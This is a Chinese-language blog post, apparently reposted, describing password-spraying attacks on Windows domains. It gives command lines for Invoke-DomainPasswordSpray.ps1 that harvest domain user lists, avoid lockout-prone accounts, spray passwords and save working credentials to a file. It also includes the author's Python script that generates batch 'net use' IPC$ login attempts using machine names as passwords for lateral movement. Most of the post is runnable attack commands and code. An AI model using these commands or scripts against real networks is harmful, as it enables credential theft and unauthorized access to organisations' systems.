域渗透:密码喷射攻击


前言:根据用户名密码规则来进行模糊测试

Invoke-DomainPasswordSpray.ps1脚本地址:http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt


自动生成来自当前用户域的用户列表,并尝试使用每个用户名和Winter2016密码进行身份验证。

powershell Invoke-DomainPasswordSpray.ps1 -Password Winter2016


从域中收集用户列表存储到user.txt中

Import-Module .\Invoke-DomainPasswordSpray.ps1
Get-DomainUserList -Domain pentest.God -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii user.txt

从users.txt中提取用户名,与pass.txt中的密码对照成一对口令,进行域认证枚举,登录成功的结果将会输出到sprayed-creds.txt

powershell .\Invoke-DomainPasswordSpray.ps1 -UserList user.txt -Domain pentest.God -PasswordList pass.txt -OutFile sprayed-creds.txt


之前看到冰冰的操作:洗数据,自己也尝试的写了一个方便来横向,自己的思路就简单点就直接机器名和密码相同进行传递,然后还可以进行改改,上面的ps脚本是来进行域中用户来进行攻击的,自己就尝试本地组来进行测试,虽然有点鸡肋,确实鸡肋,就当作自己练习了下吧,以后有好的想法再改!

# coding=utf-8
# 拆分域机器名,拼凑ipc格式,进行批量ipc
import re
import sys


content_regexp = "\s+"  # 多个空格进行字符串拆分到数组
LocalNetUseFormat = "net use \\\\{0} /u:a\\{1} {2}"
DomainNetUseFormat = "net use \\\\{0} /u:{1}\\{2} {3}"
# 首先把net group "Domain Computers" /domain得到的域机器名字放在文本中
with open("C:\\Users\\dell\\Desktop\\自己练手脚本\\IPC$横向批处理\\computer.txt", 'r') as f:
    content = f.read()
    # print(content_line)
    computer_content_array = re.split(content_regexp, content)
    # with open("domain_computer_username.txt", 'w') as b:  # 只能写,如果文件不存在则创建
    for computer in computer_content_array:
        # b.write(computer[:-1] + "\n")
        print(LocalNetUseFormat.format(
            computer[:-1], computer[:-1], computer[:-1]))  # 账号为机器名 密码为机器名
        #print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + "pass@123"))
        #print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + "p@ssw0rd"))
        #print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + computer[:-1] + "123"))


# print("处理成功,保存在当前目录下的domain_computer_username.txt文件中....")


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM